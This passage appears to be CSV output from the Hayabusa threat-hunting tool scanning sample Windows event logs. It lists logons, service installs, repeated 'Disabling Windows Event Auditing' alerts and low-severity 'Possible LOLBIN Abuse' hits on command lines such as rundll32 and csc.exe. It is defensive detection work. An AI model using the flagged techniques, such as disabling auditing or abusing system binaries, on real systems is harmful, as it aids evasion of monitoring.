System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:25:53.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1ac86,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b245,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:26:42.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-29 00:46:10.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1a23a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1a265,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-29 00:48:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1e056,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1e3c9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e3c9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e056,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x6831f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x6832b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:36.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1dc1e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:48:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1ee41,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:49:38.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1b293,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-18 23:49:42.406 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b2fd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:28:38.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 00:29:27.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1aae1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:32:23.580 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdate) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /svc | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 00:32:23.595 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdatem) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /medsvc | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 01:52:36.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 01:52:58.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-19 01:58:34.966 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 01:58:34.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:06:20.341 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:34:07.763 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:35:08.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:37:08.229 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x7d8 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:09.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:09.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:07:37.968 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:46:20.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-08-19 03:57:20.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 